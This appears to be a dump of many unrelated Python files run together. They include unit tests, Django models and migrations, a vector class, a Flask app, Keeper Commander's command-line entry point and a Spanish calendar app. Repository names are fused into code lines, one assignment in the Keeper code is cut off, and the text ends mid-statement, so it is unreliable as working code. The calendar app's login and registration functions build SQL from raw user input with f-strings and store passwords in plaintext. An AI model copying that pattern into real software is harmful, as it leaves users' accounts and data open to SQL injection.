self.assertTrue(DataType.int8().is_signed_integer()) self.assertFalse(DataType.int8().is_unsigned_integer()) self.assertFalse(DataType.int8().is_floating_point()) self.assertTrue(DataType.int8().is_int8()) self.assertTrue(DataType.int16().is_int16()) self.assertTrue(DataType.int32().is_int32()) self.assertTrue(DataType.int64().is_int64()) # unsigned integers self.assertTrue(DataType.uint8().is_uint8()) self.assertTrue(DataType.uint8().is_number()) self.assertTrue(DataType.uint8().is_integer()) self.assertFalse(DataType.uint8().is_signed_integer()) self.assertTrue(DataType.uint8().is_unsigned_integer()) self.assertFalse(DataType.uint8().is_floating_point()) # self.assertTrue(DataType.uint16().is_uint16()) self.assertTrue(DataType.uint32().is_uint32()) self.assertTrue(DataType.uint64().is_uint64()) # floating point self.assertTrue(DataType.float32().is_number()) self.assertTrue(DataType.float32().is_floating_point()) self.assertTrue(DataType.float32().is_float32()) self.assertTrue(DataType.float64().is_float64()) # c style integers self.assertTrue(DataType.c_char().is_char()) self.assertTrue(DataType.c_short().is_short()) self.assertTrue(DataType.c_int().is_int()) self.assertTrue(DataType.c_long().is_long()) self.assertFalse(DataType.c_char().is_long_long()) # c style unsigned integers self.assertTrue(DataType.c_unsigned_char().is_unsigned_char()); self.assertTrue(DataType.c_unsigned_short().is_unsigned_short()); self.assertTrue(DataType.c_unsigned_int().is_unsigned_int()); self.assertTrue(DataType.c_unsigned_long().is_unsigned_long()); # floating point self.assertTrue(DataType.c_float().is_float()); self.assertTrue(DataType.c_double().is_double()); # string self.assertTrue(DataType.char8_str().is_string()); self.assertTrue(DataType.char8_str().is_char8_str()); # index_t self.assertTrue(DataType.index_t().is_index_t()); def test_enum_ids(self): # objs self.assertEqual(DataType.empty().id(), DataType.empty_id()) self.assertEqual(DataType.object().id(), DataType.object_id()) self.assertEqual(DataType.list().id(), DataType.list_id()) # signed integers self.assertEqual(DataType.int8().id(), DataType.int8_id()) self.assertEqual(DataType.int16().id(), DataType.int16_id()) self.assertEqual(DataType.int32().id(), DataType.int32_id()) self.assertEqual(DataType.int64().id(), DataType.int64_id()) # unsigned integers self.assertEqual(DataType.uint8().id(), DataType.uint8_id()) self.assertEqual(DataType.uint16().id(), DataType.uint16_id()) self.assertEqual(DataType.uint32().id(), DataType.uint32_id()) self.assertEqual(DataType.uint64().id(), DataType.uint64_id()) # floating point self.assertEqual(DataType.float32().id(), DataType.float32_id()) self.assertEqual(DataType.float64().id(), DataType.float64_id()) def test_to_string_and_friends(self): dtypes = [ DataType.float64(), DataType.object(), DataType.list(), DataType.empty()] for d in dtypes: print("yaml rep") print(d.to_string("yaml")) print("json rep") print(d.to_string("json")) self.assertEqual(d.to_string("yaml"),d.to_yaml()) self.assertEqual(d.to_string("json"),d.to_json()) if __name__ == '__main__': unittest.main() SVArago/alexia1-10 from __future__ import unicode_literals import os from django.conf import settings from django.core.urlresolvers import reverse from django.db import models from django.db.models.signals import pre_delete from django.dispatch.dispatcher import receiver from django.utils import timezone from django.utils.encoding import python_2_unicode_compatible from django.utils.text import slugify from django.utils.translation import ugettext_lazy as _ from apps.scheduling.models import Availability, BartenderAvailability from utils.validators import validate_color @python_2_unicode_compatible class Location(models.Model): name = models.CharField(_('name'), max_length=32) is_public = models.BooleanField(_('is public'), default=False) prevent_conflicting_events = models.BooleanField(_('prevent conflicting events'), default=True) color = models.CharField(_('color'), blank=True, max_length=6, validators=[validate_color]) class Meta: ordering = ['name'] verbose_name = _('location') verbose_name_plural = _('locations') def __str__(self): return self.name class AuthenticationData(models.Model): user = models.ForeignKey( settings.AUTH_USER_MODEL, models.CASCADE, verbose_name=_('user'), ) backend = models.CharField(_('authentication backend'), max_length=50) username = models.CharField(_('username'), max_length=50) additional_data = models.TextField(_('additional data'), null=True) class Meta: unique_together = (('backend', 'username'), ('user', 'backend')) @python_2_unicode_compatible class Profile(models.Model): user = models.OneToOneField( settings.AUTH_USER_MODEL, unique=True, verbose_name=_('user'), ) is_iva = models.BooleanField( _('has IVA-certificate'), default=False, help_text=_( 'Override for an user to indicate IVA rights without uploading a certificate.' ), ) is_bhv = models.BooleanField( _('has BHV-certificate'), default=False, help_text=_( 'Designates that this user has a valid, non-expired BHV (Emergency Response Officer) certificate.' ), ) is_foundation_manager = models.BooleanField( _('is foundation manager'), default=False, help_text=_( 'Designates that this user is manager of the purchasing foundation.' ), ) is_external_entity = models.BooleanField(_('is external entity'), default=False) birthdate = models.DateField(_('birth date'), null=True) current_organization = models.ForeignKey( 'Organization', models.SET_NULL, null=True, verbose_name=_('current organization'), ) current_language = models.CharField(_('current language'), max_length=5, null=True) ical_id = models.CharField(_('iCal identifier'), max_length=36, null=True) class Meta: ordering = ['user'] verbose_name = _('profile') verbose_name_plural = _('profiles') def __str__(self): return str(self.user) def is_manager(self, organization=None): if not organization: return self.user.membership_set.filter(is_manager=True).exists() else: return self.user.membership_set.filter(organization=organization, is_manager=True).exists() def is_treasurer(self, organization=None): if not organization: return self.user.membership_set.filter(is_treasurer=True).exists() else: return self.user.membership_set.filter(organization=organization, is_treasurer=True).exists() def is_planner(self, organization=None): if not organization: return self.user.membership_set.filter(is_planner=True).exists() else: return self.user.membership_set.filter(organization=organization, is_planner=True).exists() def is_tender(self, organization=None): if not organization: return self.user.membership_set.filter(is_tender=True).exists() else: return self.user.membership_set.filter(organization=organization, is_tender=True).exists() def has_iva(self): try: approval_date = self.user.certificate.approved_at except AttributeError: approval_date = None return self.is_iva or approval_date def tended_count(self): return BartenderAvailability.objects.filter( user=self.user, event__deleted=False, event__ends_at__lte=timezone.now(), availability__nature=Availability.ASSIGNED, ).count() class PublicOrganizationManager(models.Manager): use_for_related_fields = True def get_queryset(self): return super(PublicOrganizationManager, self).get_queryset().exclude(is_public=False) @python_2_unicode_compatible class Organization(models.Model): name = models.CharField(_('name'), max_length=32, unique=True) slug = models.SlugField(_('slug'), editable=False, unique=True) is_public = models.BooleanField(_('is public'), default=False) color = models.CharField(verbose_name=_('color'), blank=True, max_length=6, validators=[validate_color]) assigns_tenders = models.BooleanField(_('assigns tenders'), default=False) members = models.ManyToManyField( settings.AUTH_USER_MODEL, through='Membership', verbose_name=_('users'), ) objects = models.Manager() public_objects = PublicOrganizationManager() class Meta: ordering = ['name'] verbose_name = _('organization') verbose_name_plural = _('organizations') def __str__(self): return self.name def save(self, force_insert=False, **kwargs): self.slug = slugify(self.__str__()) super(Organization, self).save() @python_2_unicode_compatible class Membership(models.Model): user = models.ForeignKey( settings.AUTH_USER_MODEL, models.CASCADE, verbose_name=_('user'), ) organization = models.ForeignKey( Organization, models.CASCADE, verbose_name=_('organization') ) comments = models.TextField(_('comments'), blank=True) is_tender = models.BooleanField(_('may tend on events'), default=False) is_planner = models.BooleanField(_('may create and modify events'), default=False) is_manager = models.BooleanField(_('may create and modify users'), default=False) is_treasurer = models.BooleanField(_('may see and manage finances'), default=False) is_active = models.BooleanField(_('is currently active'), default=True) onscreen_checkout = models.BooleanField(_('visible in on-screen checkout'), default=True) class Meta: ordering = ('user', 'organization') unique_together = ('user', 'organization') verbose_name = _('membership') verbose_name_plural = _('memberships') def __str__(self): return _('%(user)s of %(organization)s') % { 'user': self.user.get_full_name(), 'organization': self.organization} def get_absolute_url(self): return reverse('membership', args=[self.pk]) def tended(self): return BartenderAvailability.objects.select_related('event').filter( user=self.user, event__deleted=False, event__ends_at__lte=timezone.now(), availability__nature=Availability.ASSIGNED ).order_by('-event__starts_at') def _get_certificate_path(instance, filename): path = "certificates" ext = os.path.splitext(filename)[1] filename = "user" + str(instance.owner_id) return os.path.join(path, filename + ext) @python_2_unicode_compatible class Certificate(models.Model): file = models.FileField(_('certificate'), upload_to=_get_certificate_path) uploaded_at = models.DateField(auto_now_add=True, verbose_name=_('uploaded at')) approved_by = models.ForeignKey( settings.AUTH_USER_MODEL, models.CASCADE, related_name='approved_certificates', null=True, verbose_name=_('approved by'), ) approved_at = models.DateField(_('approved at'), null=True) owner = models.OneToOneField( settings.AUTH_USER_MODEL, models.CASCADE, verbose_name=_('certificate'), ) def __str__(self): return '%s %s' % ( _('IVA certificate of'), self.owner.get_full_name(), ) def approve(self, approver): self.approved_by = approver self.approved_at = timezone.now() self.save() approve.alters_data = True def decline(self): self.delete() decline.alters_data = True @receiver(pre_delete, sender=Certificate) def certificate_delete(sender, instance, **kwargs): instance.file.delete(False) venv/lib/python3.8/site-packages/pyls/config/pycodestyle_conf.py /home/runner/.cache/pip/pool/e0/9b/c6/27a92213f9ee5de0ba9d5354337667742f8f5af8a4026f586b65b73048import numpy as np import matplotlib.pyplot as plt from nudetect import Noise noise = Noise('/disk/lif2/spike/detectorData/' 'H117/20180803_H117_noise_-10C_-500V/20180803_H117_noise_-10C_-500V.fits', data_dir='/users/jmsander/outputs/{}/noise/data', plot_dir='/users/jmsander/outputs/{}/noise/plots', detector='H117', voltage=-500, temp=5) noise.select_detector_region(5, 5, 10, 10) noise.load_raw_data() # # Processing data # # Generating both count and FWHM data for each pixel. noise.gen_quick_noise(plot_subdir='pixels') noise.gen_full_noise(save_plot=True, plot_subdir='pixels') # # Plotting # # Plotting a pixel heatmap and histogram of count data wrt pixels. noise.plot_pixel_map('Count') noise.plot_pixel_hist('Count') # Plotting a pixel heatmap and histogram using the FWHM of the # Gaussian fitted to the noise spectrum. noise.plot_pixel_map('FWHM') noise.plot_pixel_hist('FWHM') noise.plot_pixel_map('Mean') noise.plot_pixel_hist('Mean') from __future__ import annotations import io from typing import Optional from xml.etree import ElementTree from pykotor.resource.formats.tlk.data import TLK from pykotor.resource.type import SOURCE_TYPES, TARGET_TYPES, ResourceReader, ResourceWriter class TLKXMLReader(ResourceReader): def __init__(self, source: SOURCE_TYPES, offset: int = 0, size: int = 0): super().__init__(source, offset, size) self._xml_root: ElementTree.Element = ElementTree.parse(io.StringIO(self._reader.read_bytes(self._size).decode())).getroot() self._tlk: Optional[TLK] = None def load(self, auto_close: bool = True) -> TLK: self._tlk = TLK() # TODO if auto_close: self._reader.close() return self._tlk class TLKXMLWriter(ResourceWriter): def __init__(self, tlk: TLK, target: TARGET_TYPES): super().__init__(target) self.xml_root: ElementTree.Element = ElementTree.Element("xml") self.tlk: TLK = tlk def write(self, auto_close: bool = True) -> None: # TODO ElementTree.indent(self.xml_root) self._writer.write_bytes(ElementTree.tostring(self.xml_root)) if auto_close: self._writer.close() AbdealiJK/find-java0 #!/usr/bin/env python from setuptools import setup version_ns = {} with open('findjava.py') as f: for line in f: if line.startswith('__version__'): exec(line, version_ns) break setup( name='findjava', version=version_ns['__version__'], py_modules=['findjava'], description="Find java to add it to the environment.", long_description=""" Provides findjava.init() to add JAVA_HOME environment variable """, license="MIT", author="AbdealiJK", author_email="", url="https://github.com/AbdealiJK/findjava", entry_points={ 'console_scripts': ['findjava = findjava:main'], }, ) from contextlib import contextmanager from dht.cluster.base import Cluster from dht.utils import rehash, quorum class ReplicatedClusterMixin(object): def __init__(self, members, replica_count=3, read_durability=None, write_durability=None, *args, **kwargs): self.replica_count = 3 self.read_durability = read_durability self.write_durability = write_durability super(ReplicatedClusterMixin, self).__init__(members, *args, **kwargs) @contextmanager def __call__(self, read_durability=None, write_durability=None): # We need to retrieve the original durability values -- not the # property values -- to allow for dynamic quorum calculation to # continue after the context manager exits. original_read_durability = self._read_durability if read_durability is not None: self.read_durability = read_durability original_write_durability = self._write_durability if write_durability is not None: self.write_durability = write_durability yield self.read_durability = original_read_durability self.write_durability = original_write_durability # TODO: Actually implement tunable durability/quorums. def __getitem__(self, key): keys = self.rehash(key) values = [] for key in keys: values.append(super(ReplicatedClusterMixin, self).__getitem__(key)) # TODO: Add conflict resolution logic. assert len(set(values)) == 1 return values[0] def __setitem__(self, key, value): keys = self.rehash(key) for key in keys: super(ReplicatedClusterMixin, self).__setitem__(key, value) def __delitem__(self, key): keys = self.rehash(key) for key in keys: super(ReplicatedClusterMixin, self).__delitem__(key) def rehash(self, key): return map(lambda hash: '%s:%s' % (key, hash), rehash(key, self.replica_count)) def get_read_durability(self): return getattr(self, '_read_durability', None) or quorum(self.replica_count) def set_read_durability(self, value): if value is not None and value < 1: raise ValueError('Read durability must be greater than zero') elif value > self.replica_count: raise ValueError('Read durability may not be greater than the cluster replica count') self._read_durability = value read_durability = property(get_read_durability, set_read_durability) def get_write_durability(self): value = getattr(self, '_write_durability', None) if value is not None: return value else: return quorum(self.replica_count) def set_write_durability(self, value): if value > self.replica_count: raise ValueError('Write durability may not be greater than the cluster replica count') self._write_durability = value write_durability = property(get_write_durability, set_write_durability) class ReplicatedCluster(ReplicatedClusterMixin, Cluster): pass """ Copyright (c) 2016-2020 http://www.keithsterling.com Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. This is an example extension that allow you to call an external service to retreive the energy consumption data of the customer. Currently contains no authentication """ from programy.utils.logging.ylogger import YLogger from programy.extensions.base import Extension class TranslateExtension(Extension): # execute() is the interface that is called from the tag in the AIML def execute(self, client_context, data): YLogger.debug(client_context, "Translate - Calling external service for with extra data [%s]", data) # TRANSLATE FROM EN TO FR words = data.split(" ") if len(words) > 5: if words[0] == "TRANSLATE": if words[1] == "FROM": from_lang = words[2] if words[3] == "TO": if client_context.bot.from_translator is not None: to_lang = words[4] text = " ".join(words[5:]) translated = client_context.bot.from_translator.translate(text, from_lang, to_lang) return "TRANSLATED %s" % translated else: return "TRANSLATE DISABLED" elif len(words) == 2: if words[1] == 'ENABLED': if client_context.bot.from_translator is not None: return "TRANSLATE ENABLED" else: return "TRANSLATE DISABLED" return "TRANSLATE INVALID COMMAND" import math def are_parallel(v1, v2): """ Determines whether two vectors are parallel """ zero = Vector(0, 0, 0) cross = cross_product(v1, v2) return zero == cross def are_orthogonal(v1, v2): """ Determines whether two vectors are orthogonal """ return dot_product(v1, v2) == 0 def cross_product(v1, v2): """ Computes the outer product/cross product of two given vectors """ return Vector(v1.y*v2.z - v1.z*v2.y, v1.z*v2.x - v1.x*v2.z, v1.x*v2.y - v1.y*v2.x) def dot_product(v1, v2): """ Computes the inner product/dot product of two given vectors """ return v1.x*v2.x + v1.y*v2.y + v1.z*v2.z def magnitude(v): """ Computes the euclidean norm of a given vector """ return math.sqrt(v.x*v.x + v.y*v.y + v.z*v.z) def normalize(v): """ Generates the corresponding unit vector from the given vector """ norm = Vector.magnitude(v) if norm != 0: return v / norm else: return Vector(0, 0, 0) class Vector: """ Represents a 3D math/geometry vector """ def __init__(self, x=0, y=0, z=0): self.x = x self.y = y self.z = z def magnitude(self): return magnitude(self) def __iter__(self): yield self.x yield self.y yield self.z def __getitem__(self, index): if index == 0: return self.x elif index == 1: return self.y elif index == 2: return self.z else: raise IndexError def __add__(self, other): return Vector(self.x + other.x, self.y + other.y, self.z + other.z) def __iadd__(self, other): self.x += other.x self.y += other.y self.z += other.z return self def __sub__(self, other): return Vector(self.x - other.x, self.y - other.y, self.z - other.z) def __isub__(self, other): self.x -= other.x self.y -= other.y self.z -= other.z return self def __mul__(self, multiple): return Vector(self.x*multiple, self.y*multiple, self.z*multiple) def __imul__(self, multiple): self.x *= multiple self.y *= multiple self.z *= multiple return self def __truediv__(self, divisor): return Vector(self.x / divisor, self.y / divisor, self.z / divisor) def __itruediv__(self, divisor): self.x /= divisor self.y /= divisor self.z /= divisor return self def __ifloordiv__(self, divisor): self.x //= divisor self.y //= divisor self.z //= divisor return self def __floordiv__(self, divisor): return Vector(self.x // divisor, self.y // divisor, self.z // divisor) def __idiv__(self, divisor): self.x /= divisor self.y /= divisor self.z /= divisor return self def __eq__(self, other): return self.x == other.x and self.y == other.y and self.z == other.z def __ne__(self, other): return self.x != other.x or self.y != other.y or self.z != other.z def __str__(self): return "({0}, {1}, {2})".format(self.x, self.y, self.z) def __repr__(self): return "Vector(x={0},y={1},z={2})".format(self.x, self.y, self.z) def copy(self): """ Returns a deep copy of the current vector instance. """ return Vector(self.x, self.y, self.z) jaehyoungyoo/airbnb_cloneairbnb/rooms/migrations/0006_auto_20190601_2247.py # Generated by Django 2.1.8 on 2019-06-01 13:47 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('rooms', '0005_auto_20190601_1710'), ] operations = [ migrations.RemoveField( model_name='room', name='map_address', ), migrations.AddField( model_name='room', name='lat', field=models.FloatField(blank=True, null=True), ), migrations.AddField( model_name='room', name='lng', field=models.FloatField(blank=True, null=True), ), ] 2020/13/part_1.py """ day 13 """ def read_input(file_path): with open(file_path, 'r') as file_handle: lines = file_handle.readlines() arrival = int(lines[0].strip()) busses = [] for bus in lines[1].strip().split(","): if bus != "x": busses.append(int(bus)) return (arrival, busses) def solve(arrival, busses): def find_first_bus(): timestamp = arrival while True: for bus in busses: if (timestamp % bus) == 0: return bus, timestamp timestamp += 1 bus, timestamp = find_first_bus() return bus * (timestamp - arrival) def main(): print(solve(*read_input("sample.txt"))) print(solve(*read_input("input.txt"))) if __name__ == "__main__": main()import bisect import os import json import flask # the app object app = flask.Flask(__name__, static_url_path='') # setup path = os.path.join(os.path.split(__file__)[0], 'data/all.json') with open(path, "rt") as fp: all_dict = json.load(fp) all_sorted = sorted(all_dict.keys()) # this route is not needed in production @app.route('/', methods=['GET']) def index(): return app.send_static_file("html/index.html") @app.route('/app/suggest', methods=['POST']) def suggest(): obj = flask.request.get_json() p_naked = obj['Naked'] pos = bisect.bisect_left(all_sorted, p_naked) raw_results = all_sorted[pos:pos+10] obj['Nakeds'] = raw_results return flask.jsonify(obj) @app.route('/app/naked', methods=['POST']) def naked(): jsonobject = flask.request.get_json() for obj in jsonobject: p_naked = obj['Naked'] if p_naked in all_dict: results = all_dict[p_naked] else: results = [] obj['Nikudim'] = results return flask.jsonify(jsonobject) if __name__ == '__main__': app.run(host='127.0.0.1', port=8080, debug=True) from io import BytesIO from typing import IO, Optional from wai.test.serialisation import RegressionSerialiser class BinaryFileSerialiser(RegressionSerialiser): @classmethod def binary(cls) -> bool: return True @classmethod def extension(cls) -> str: return "bin" @classmethod def serialise(cls, result: BytesIO, file: IO[bytes]): result.seek(0) file.write(result.read()) @classmethod def deserialise(cls, file: IO[bytes]) -> BytesIO: result = BytesIO() result.write(file.read()) return result @classmethod def compare(cls, result: BytesIO, reference: BytesIO) -> Optional[str]: result.seek(0) reference.seek(0) if result.read() != reference.read(): return "Binary files don't match" return None ishirav/cronorc # Generated by Django 2.2.9 on 2020-02-01 15:22 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('main', '0005_execution_notification'), ] operations = [ migrations.AddField( model_name='job', name='display_name', field=models.CharField(blank=True, max_length=100, null=True), ), ] esa-security-deverlopment/Commander0 # -*- coding: utf-8 -*- # _ __ # | |/ /___ ___ _ __ ___ _ _ ® # | ' # Copyright 2018 Keeper Security Inc. # Contact: # import re import sys import os import argparse import shlex import json import logging import base64 from . import __version__ from .params import KeeperParams from . import cli def get_params_from_config(config_filename): params = KeeperParams() params.config_filename = config_filename or 'config.json' try: with open(params.config_filename) as config_file: try: params.config = json.load(config_file) if 'user' in params.config: params.user = params.config['user'].lower() if 'server' in params.config: params.server = params.config['server'] if 'password' in params.config: params.password = params.config['password'] if 'timedelay' in params.config: params.timedelay = params.config['timedelay'] if 'mfa_token' in params.config: params.mfa_token = params.config['mfa_token'] if 'mfa_type' in params.config: params.mfa_type = params.config['mfa_type'] if 'commands' in params.config: if params.config['commands']: params.commands.extend(params.config['commands']) if 'plugins' in params.config: params.plugins = params.config['plugins'] if 'debug' in params.config: params.debug = params.config['debug'] if 'batch_mode' in params.config: params.batch_mode = params.config['batch_mode'] == True if 'device_id' in params.config: device_id = base64.urlsafe_b64decode(params.config['device_id'] + '==') params.rest_context.device_id = device_id except: print('Error: Unable to parse JSON file ' + params.config_filename) raise except IOError: if config_filename: print('Error: Unable to open config file ' + config_filename) pass if not params.server: params.server = 'https://keepersecurity.com/api/v2/' return params def usage(m): print(m) parser.print_help() cli.display_command_help(show_enterprise=True, show_shell=True) sys.exit(1) parser = argparse.ArgumentParser(prog='keeper', add_help=False) parser.add_argument('--server', '-ks', dest='server', action='store', help='Keeper Host address.') parser.add_argument('--user', '-ku', dest='user', action='store', help='Email address for the account.') parser.add_argument('--password', '-kp', dest='password', action='store', help='Master password for the account.') parser.add_argument('--version', dest='version', action='store_true', help='Display version') parser.add_argument('--config', dest='config', action='store', help='Config file to use') parser.add_argument('--debug', dest='debug', action='store_true', help='Turn on debug mode') parser.add_argument('--batch-mode', dest='batch_mode', action='store_true', help='Run commander in batch or basic UI mode.') parser.add_argument('command', nargs='?', type=str, action='store', help='Command') parser.add_argument('options', nargs='*', action='store', help='Options') parser.error = usage def main(): logging.basicConfig(level=logging.INFO, format='%(message)s') sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) opts, flags = parser.parse_known_args(sys.argv[1:]) params = get_params_from_config(opts.config) if opts.debug: params.debug = opts.debug if opts.batch_mode: params.batch_mode = True if opts.server: params.server = 'https://{0}/api/v2/'.format(opts.server) if opts.user: params.user = opts.user if opts.password: params.password = opts.password else: pwd = os.getenv('KEEPER_PASSWORD') if pwd: params.password = if opts.version: print('Keeper Commander, version {0}'.format(__version__)) return if flags and len(flags) > 0: if flags[0] == '-h': flags.clear() opts.command = '?' if (opts.command or '') in {'?', ''}: if opts.command == '?' or not params.commands: usage('') if params.timedelay >= 1 and params.commands: cli.runcommands(params) else: if opts.command != 'shell': if opts.command: flags = ' '.join([shlex.quote(x) for x in flags]) if flags is not None else '' options = ' '.join([shlex.quote(x) for x in opts.options]) if opts.options is not None else '' command = ' '.join([opts.command, flags, options]) params.commands.append(command) params.commands.append('q') cli.loop(params) if __name__ == '__main__': main() ''' _____ _ | ___| _ _ __ ___(_) ___ _ __ ___ ___ | |_ | | | | '_ \ / __| |/ _ \| '_ \ / _ \/ __| | _|| |_| | | | | (__| | (_) | | | | __/\__ \. |_| \__,_|_| |_|\___|_|\___/|_| |_|\___||___/ ''' import sqlite3 import calendario as cal import admin as adm import webbrowser import pandas as pd import os from tkinter import * from t3 import calendario def exportar_a_fichero(Tabla): ''' Exporta una tabla a fichero ''' database = "agenda.db" conn = create_connection(database) consulta = pd.read_sql_query(f"SELECT * FROM '{Tabla}'", conn) df = pd.DataFrame(consulta) path = r"{}\{}.csv".format(os.getcwd(), Tabla) df.to_csv (path, index = False) def abrir_google_maps(url): ''' Abre la url deseada ''' webbrowser.open_new(url) def create_connection(db_file): ''' Recibe un fichero de base de datos y devuelve una conexion sqlite3 ''' conn = None try: conn = sqlite3.connect(db_file) return conn except sqlite3.Error as e: print(e) return conn def create_table(conn, create_table_sql): ''' Recibe una consulta SQL para crear una tabla y la ejecuta sobre la base de datos ''' try: c = conn.cursor() c.execute(create_table_sql) except sqlite3.OperationalError as e: print(e) def crear_tabla_usuarios(database): ''' Crea la tabla Usuarios ''' sql_create_citas_table = """ CREATE TABLE IF NOT EXISTS Usuarios ( username text PRIMARY KEY, password text ) ; """ conn = create_connection(database) if conn is not None: create_table(conn, sql_create_citas_table) else: print("Error! cannot create citas table") return def crear_tabla_citas(database): ''' Crea la tabla Citas ''' sql_create_citas_table = """ CREATE TABLE IF NOT EXISTS Citas ( id_cita integer PRIMARY KEY AUTOINCREMENT, username integer, nombre text, descripcion text, lugar text, fecha text, hora text, importancia integer, FOREIGN KEY(username) REFERENCES Usuarios(username) ) ; """ conn = create_connection(database) if conn is not None: create_table(conn, sql_create_citas_table) else: print("Error! cannot create citas table") return def crear_tabla_ajustes(database): ''' Crea la tabla Ajustes ''' sql_create_citas_table = """ CREATE TABLE IF NOT EXISTS Ajustes ( username text PRIMARY KEY, font text DEFAULT 'Times', fontsize integer DEFAULT 14, background_color text DEFAULT '#0B5A81' ) ; """ conn = create_connection(database) if conn is not None: create_table(conn, sql_create_citas_table) else: print("Error! cannot create citas table") return def insert_row_citas(id_user,nombre, descripcion, lugar,fecha,hora, importancia): ''' Inserta una cita en la tabla Citas ''' try: database = "agenda.db" conn = create_connection(database) c = conn.cursor() introducir_cita = f"""INSERT INTO Citas (username,nombre,descripcion,lugar,fecha,hora,importancia) VALUES ('{id_user}','{nombre}','{descripcion}','{lugar}', '{fecha}','{hora}','{importancia}');""" print('Insertando ', introducir_cita) c.execute(introducir_cita) conn.commit() conn.close() except sqlite3.OperationalError as msg: print("Error en el registro de citas ") print(msg) def get_cita(username,fecha): ''' Obtiene la cita de un usuario en una fecha determinada ''' try: database = "agenda.db" conn = create_connection(database) c = conn.cursor() buscar_factura= f"SELECT * from Citas WHERE fecha= '{fecha}' and username = '{username}' ;" c.execute(buscar_factura) row = c.fetchone() if row: # Una fila devuelta print('Cita encontrada - Get Citas OK') else: print('Cita NO encontrado - Get Citas ERROR') return row except sqlite3.OperationalError as msg: print("Error al encontrar la de facturas") def drop_table(tabla): ''' Recibe una consulta SQL para borrar una tabla y la ejecuta sobre la base de datos ''' try: conn = create_connection('agenda.db') c = conn.cursor() borrar_tabla = f"DROP TABLE {tabla} ;" c.execute(borrar_tabla) except sqlite3.OperationalError as msg: print(msg) print("Error al encontrar la de citas") def borrar_cita(): ''' Borra una cita de la BBDD ''' try: conn = create_connection('agenda.db') c = conn.cursor() query = f"DELETE from Citas where Fecha" c.execute(query) except sqlite3.OperationalError as msg: print(msg) print("Error al encontrar la de citas") def get_citas_importancia(): ''' Devuelve un listado de las citas de un usuario con su importancia ''' database = "agenda.db" conn = create_connection(database) c = conn.cursor() buscar_factura= f"SELECT fecha, importancia from Citas;" c.execute(buscar_factura) res = c.fetchall() return res def drop_table_citas(): ''' Recibe una consulta SQL para crear una tabla y la ejecuta sobre la base de datos ''' try: conn = create_connection('agenda.db') c = conn.cursor() borrar_tabla = f"DROP TABLE Citas ;" c.execute(borrar_tabla) except sqlite3.OperationalError as msg: print(msg) def login_attempt(username,password,padre): ''' Realizamos un intento de login con los datos proporcionados en la BBDD ''' if len(password) != 0: print('Login') # Comprobar usuario en BBDD conn = create_connection('agenda.db') buscar_usuario = f"SELECT username from Usuarios WHERE username='{username}' and password='{password}';" c = conn.cursor() c.execute(buscar_usuario) row = c.fetchone() if row: # Una fila devuelta print('Usuario encontrado - Login OK') print(row) padre.destroy() # Cambiar por el calendario if row[0] == "admin": adm.ventana_admin() else: calendario(username) return else: print('Usuario NO encontrado - Login ERROR') print('Usuario o contraseña INCORRECTA') else: print('Password vacia') def register_attempt(username,passwd,repasswd,padre): ''' Intentamos hacer un registro en la base de datos Si Register_OK --> True [] --> False ''' if passwd == repasswd and len(passwd) > 0: conn = create_connection('agenda.db') buscar_usuario = f"SELECT username from Usuarios WHERE username='{username}';" c = conn.cursor() c.execute(buscar_usuario) row = c.fetchone() if not row: # Ninguna fila devuelta registrar_usuario = f"INSERT INTO Usuarios (username,password) VALUES('{username}','{passwd}');" try: c.execute(registrar_usuario) default_settings = f"INSERT INTO Ajustes (username) VALUES('{username}');" c.execute(default_settings) conn.commit() conn.close() print("Registro usuario OK") padre.destroy() except sqlite3.OperationalError as msg: print("Registro usuario ERROR") print(msg) else: print('El usuario ya existe en la BBDD ') print(row) else: print("Las password no coinciden o son NULL") def get_user_settings(username): ''' Obtiene los settings del usuario ''' conn = create_connection('agenda.db') listar = f"SELECT * from Ajustes WHERE username = '{username}';" c = conn.cursor() c.execute(listar) user_settings = c.fetchone() return user_settings def listado_bbdd(): ''' ''' conn = create_connection('agenda.db') listar = f'SELECT username from Usuarios;' c = conn.cursor() c.execute(listar) rows = c.fetchall() for row in rows: print(row) def listado_citas_usuario(username): ''' Devuelve las citas del usuario @param(username) ''' conn = create_connection('agenda.db') listar = f"SELECT fecha, importancia from Citas WHERE username LIKE '{username}';" c = conn.cursor() c.execute(listar) rows = c.fetchall() citas_importancia = [] # result = [dict(row) for row in c.fetchall()] for row in rows: citas_importancia.append(row) return citas_importancia def create_tables_agenda(db_file): ''' Crea las tablas necesarias para ejecutar la agenda ''' crear_tabla_usuarios(db_file) print('Tabla Usuarios creada con exito!') crear_tabla_citas(db_file) print('Tabla Citas creada con exito!') crear_tabla_ajustes(db_file) print('Tabla Ajustes creada con exito!') guimaraesalves/material-python0 n1 = int(input()) n2 = int(input()) s = n1 + n2 print ('SOMA =', s) bot/VoiceUser.py0 import os import discord import asyncio from discord import ChannelType class VoiceUser: def __init__(self, client): self.client = client self.voiceClient = None self.player = None async def joinCommandAuthorVoiceChannel(self, author): for channel in self.client.get_all_channels(): if channel.type == ChannelType.voice and author in channel.voice_members: self.voiceClient = await self.client.join_voice_channel(channel) return True # if author not in a voice channel for channel in self.client.get_all_channels(): if channel.type == ChannelType.voice and len(channel.voice_members): self.voiceClient = await self.client.join_voice_channel(channel) return True return Falsefrom simply_ts_domain import simplified_ts_domain def main(): file_path = str(input('Output file path: ')) file_name = str(input('Generated File Name: ')) study_type = str(input('Study Type [clinical, non-clinical]: ')) study_id = str(input('Study ID: ')) start_date = str(input('Study Start Date [YYYY-MM-DD]: ')) study_except_code = str(input('Study Start Date Exception Code: ')) if 